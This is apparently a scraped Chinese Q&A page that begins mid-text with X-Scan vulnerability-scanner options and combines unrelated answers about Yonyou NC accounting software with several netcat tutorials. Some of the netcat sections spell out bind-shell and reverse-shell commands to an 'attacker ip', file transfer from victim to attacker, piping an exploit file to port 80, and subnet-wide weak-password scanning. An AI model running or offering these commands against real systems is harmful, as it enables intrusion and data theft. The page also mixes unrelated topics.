-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file ho

4. 用友nc使用視頻教程或日常使用手冊急!!

手冊可以在這裡面找下:http://wenku..com/search?word=%D3%C3%D3%D1nc&lm=0&od=0
或者http://60.2.99.94/data/jcgc/dfp.doc
視頻在這個網站里有下載:http://bbs.iufida.com/

5. NC用友系統怎麼用

跟所有的財務系統都差不多呀。主要是熟練的過程得花點時間,呵呵。樓主加油,相信你可以的!頂一個!

6. 電腦常識:DOS命令之NC的定義和用法是

NC(netcat)的使用方法!
連接到某處:nc [-options] hostname port[s] [ports].....
監聽某埠等待連接:nc -l -p port [options] [hostname] [port] -options
-d 後台運行
-e prog 程序重定向,一旦有連接,就執行綁定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i 設定延時時間。
-l 監聽方式,等待連入。連接完成後,結束監聽。
-L 監聽方式,等待連入。連接完成後,繼續監聽。
-n 只能使用ip地址。
-o file 指定要傳送的16進制代碼。
-p port 指定本地的埠號。
-r 隨意指定本地或遠程埠號。
-s addr 本地的源地址。
-t 回顯telnet信息。
-u UDP方式。
-v 顯示詳細的信息,-vv 可獲取更詳細的信息。
-w 指定超時的時間。
-z 用於scan。
以上就是nc的一些參數和選項,注意,這是nt版本的nc。如果是*nix的需要自己編譯。也都差不多,只是netcat.c默認是沒有-t和-e這個兩個參數,要改。
看看它能幹些什麼,(偶就知道這些)
1.埠的刺探:
nc -vv ip port
2.掃描器
nc -v -w 5 ip port-port
nc -v -z ip port-port
3. 後門
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一個shell。
4.反向連接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.傳送文件:
attacker machine <-- victim machine
nc -d -l -p port < path file /*attacker machine*/
nc -vv attacker ip -p port > path file /*victim machine*/
attacker machine --> victim machine
nc -vv -l -p > patm file/*victim machine*/
nc -d victim ip -p port < path file /*attacker machine*/

7. Linux nc命令詳解 Linux nc命令怎麼用

Linux中nc命令是一個功能強大的網路工具,全稱是netcat。

語法:
nc [-hlnruz][-g<網關...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出文件>][-p<通信埠>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通信埠...]
參數說明:
-g<網關> 設置路由器躍程通信網關,最丟哦可設置8個。
-G<指向器數目> 設置來源路由指向器,其數值為4的倍數。
-h 在線幫助。
-i<延遲秒數> 設置時間間隔,以便傳送信息及掃描通信埠。
-l 使用監聽模式,管控傳入的資料。
-n 直接使用IP地址,而不通過域名伺服器。
-o<輸出文件> 指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存。
-p<通信埠> 設置本地主機使用的通信埠。
-r 亂數指定本地與遠端主機的通信埠。
-s<來源位址> 設置本地主機送出數據包的IP地址。
-u 使用UDP傳輸協議。
-v 顯示指令執行過程。
-w<超時秒數> 設置等待連線的時間。
-z 使用0輸入/輸出模式,只在掃描通信埠時使用。
實例:
1、TCP埠掃描
# nc -v -z -w2 127.0.0.1 1-100
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
...
nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused

2、從192.168.1.2拷貝文件到192.168.1.3
首先在接收端192.168.1.3上: nc -l 1234 > test.txt
然後在發送端192.168.1.2上: nc 192.168.1.3 < test.txt
注意:先運行接收端,指定一個埠為1234,文件為test.txt,再執行發送端,並且發送端必須存在同名的文件test.txt

3、傳輸目錄
從server1(192.168.16.233)拷貝nginx目錄內容到server2(192.168.48.47)上。需要先在server2上,用nc激活監聽,
server2上運行:# nc -l 1234 | tar xzv-
server1上運行:# tar czv- nginx | nc 192.168.48.47 1234

4、簡單聊天工具
在192.168.1.2上: nc -l 1234
在192.168.1.3上: nc 192.168.1.2 1234
這樣,雙方就可以相互交流了。使用ctrl+C(或D)退出

8. linux怎麼使用nc命令來發送一串使用udp協議的數據或者不是NC也可以的命令

echo -n 「foo" | nc -4u -w1 <host> <udp port>
或者
echo -n "hello" >/dev/udp/localhost/8000

9. nc如何使用

一、基本使用
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定埠等待連接: nc -l -p port [-options] [hostname] [port]
參數:

-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
G num source-routing pointer: 4, 8, 12, …
-I secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地埠號
-r 任意指定本地及遠程埠
-s addr 本地源地址
-t 以telnet的形式應答
-u UDP模式
-v 詳細輸出——用多個-v可得到更詳細的內容
-z 將輸入輸出關掉——用於掃描時
-w secs timeout的時間
二. 它的簡單使用方法
1.nc -l -p 80
監聽80埠
2.nc -l -p 80 >c:\log.dat
監聽80埠,並把信息記錄到log.dat
3.nc -v -l -p 80
監聽80埠,並顯示埠信息
4.nc -l -p 80 -t -e cmd.exe
監聽本地的80埠的入站信息,同時將cmd.exe重定向至80埠,當有人連接的時候,就讓cmd.exe以telnet的形式應答
5.nc -v ip port
掃描某ip的某個埠
6.nc -v -z ip port-port
掃描某ip的某埠到某埠
7.nc -v -z -u ip port-port
掃描某ip的某udp埠到某udp埠
7.掃描遠程主機
nc -nvv -w2 -z 192.168.x.x 80-445
掃描192.168.x.x的TCP 80到TCP445的所有埠
8.REMOTE主機綁定SHELL
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
9.REMOTE主機綁定SHELL並反向連接
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354埠
三.使用的例子
1. 計算機192.168.0.1運行:nc -v -n -p 99
計算機192.168.0.8運行:nc -e cmd.exe 192.168.0.1 99
這樣我們就獲得了192.168.0.8的一個shell
2.計算機192.168.0.1運行:nc -v -n 192.168.0.8 99
計算機192.168.0.8運行:nc -v -l -p 99 >d:\sc.exe
四.高級用法:
1.作攻擊程序用
格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
連接到192.168.x.x的80埠,並在其管道中發送』c:\exploit.txt』的內容(兩種格式確有相同的效果, 真是有異曲同工之妙)
2.作蜜罐用
nc -L -p 80 > c:\log.txt
使用』-L』可以不停地監聽某一個埠,直到ctrl+c為止,同時把結果輸出到』c:\log.txt』中,如果把』>』 改為』>>』即可以追加日誌
3.作蜜罐用
nc -L -p 80 < c:\honeypot.txt
使用』-L』可以不停地監聽某一個埠,直到ctrl+c為止,並把』c:\honeypot.txt』的內容』送』入其 管道中

閱讀全文

與nc使用方法相關的資料

熱點內容
TP集線器連接方法 瀏覽:560
國際危機管理研究方法 瀏覽:681
蝴蝶蘭如何換盆養殖方法 瀏覽:671
肝內血管瘤都有哪些治療方法 瀏覽:463
副舟骨切除手術有哪些方法 瀏覽:310
內存卡和顯卡在哪裡設置方法 瀏覽:209
活動產品分析法常用的方法是什麼 瀏覽:658
劣質蜂王漿的鑒別方法 瀏覽:638
小兔音響連接方法 瀏覽:48
如何用科學方法大眼睛 瀏覽:822
仰卧起坐腹橫肌鍛煉方法圖解 瀏覽:388
科目一背誦方法和技巧 瀏覽:798
棉被芯怎麼除蟎蟲最有效方法 瀏覽:712
數字電橋漏感測量方法 瀏覽:176
菜鳥正確使用方法 瀏覽:996
干蒜片食用方法 瀏覽:440
怎麼折疊桌子的方法 瀏覽:226
clarigo對講機使用方法 瀏覽:328
男人口苦的治療方法 瀏覽:166
高二自控能力差的解決方法 瀏覽:746